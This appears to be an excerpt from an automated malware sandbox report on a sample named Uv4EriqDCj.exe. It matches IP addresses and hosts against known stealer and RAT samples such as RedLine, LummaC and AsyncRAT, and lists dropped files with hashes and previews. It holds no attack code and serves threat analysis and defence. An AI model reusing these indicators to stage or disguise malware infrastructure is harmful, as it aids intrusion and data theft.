                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              104.26.12.31VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                              • ip.sb/
                                                                                                                                              185.222.58.36PO_4123.msiGet hashmaliciousAsyncRATBrowse
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                api.ip.sb.cdn.cloudflare.netnePPsHIZ1m.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 104.26.13.31
                                                                                                                                                CxfUzjqyxz.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 104.26.13.31
                                                                                                                                                1w5RpHuliE.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, VidarBrowse
                                                                                                                                                • 172.67.75.172
                                                                                                                                                SecuriteInfo.com.Win32.Evo-gen.12305.7160.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 104.26.13.31
                                                                                                                                                rH3TpuMpZn.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Quasar, RedLine, VidarBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                Ryay9q4aDy.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                • 104.26.13.31
                                                                                                                                                random.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                random.exeGet hashmaliciousAmadey, Credential Flusher, GCleaner, KeyLogger, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                • 104.26.13.31
                                                                                                                                                random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, Vidar, XWorm, XmrigBrowse
                                                                                                                                                • 104.26.13.31
                                                                                                                                                3WSFIhTu1M.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 104.26.13.31
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                CLOUDFLARENETUSH3Ze9Uj.exeGet hashmaliciousXWormBrowse
                                                                                                                                                • 104.21.1.182
                                                                                                                                                spoDnGT.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.23.62
                                                                                                                                                kzTq7Bt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.21.2.178
                                                                                                                                                GWZ8arC.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.23.85
                                                                                                                                                random.exeGet hashmaliciousAmadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                • 104.21.23.62
                                                                                                                                                fp76Xtt.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.65.45
                                                                                                                                                d2YQIJa.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.96.1
                                                                                                                                                Bjkm5hE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.83.156
                                                                                                                                                random.exeGet hashmaliciousAmadey, LummaC Stealer, Poverty Stealer, Quasar, Stealc, Vidar, XenoRATBrowse
                                                                                                                                                • 172.67.209.219
                                                                                                                                                random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                • 104.21.23.62
                                                                                                                                                ROOTLAYERNETNLnePPsHIZ1m.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 45.137.22.165
                                                                                                                                                3WSFIhTu1M.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.58.254
                                                                                                                                                qJ64p5G1XJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 45.137.22.227
                                                                                                                                                chTJmCR9bS.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                • 185.222.57.84
                                                                                                                                                RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                                                                                                                                • 185.222.57.67
                                                                                                                                                p0GiAimtNm.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.58.237
                                                                                                                                                nzLoHpgAln.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.57.76
                                                                                                                                                ljMiHZ8MwZ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 45.137.22.250
                                                                                                                                                aYf5ibGObB.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.58.90
                                                                                                                                                K3xL5Xy0XS.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 185.222.58.90
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9adJustificante67ab404ffe31b359e00a499e656454545.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                PO1302202500018273645.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                000999374847565342.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                nePPsHIZ1m.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                SPECIFICATIONS112025.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                T506-21120.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                ORDER-REQUIRED-CONFIRMATION-OFFER.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                foreign.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                don.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                                                                                • 104.26.12.31
                                                                                                                                                No context
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1216
                                                                                                                                                Entropy (8bit):5.34331486778365
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):2232
                                                                                                                                                Entropy (8bit):5.379460230152629
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugei/ZPUyus:fLHyIFKL3IZ2KRH9Ougss
                                                                                                                                                MD5:13A0210EC58120EB2CD3445DB5AA3776
                                                                                                                                                SHA1:3F4A3CC558C2298A0A4A5550005867DA4CE17040
                                                                                                                                                SHA-256:8668682A9DF285C90FBF4AF490B8569E4261A3934650B51A659A229C80F6F391
                                                                                                                                                SHA-512:35B241B4A5E13ECF18A6E45A5AD8B34EDCDBBBBF6235A200C1FB346A66626161D96578B361044AD0AFB221502C0D2F1A25633D53B76BAD2DD67BE2F91C91463C
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):114688
                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.694985340190863
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                Malicious:false
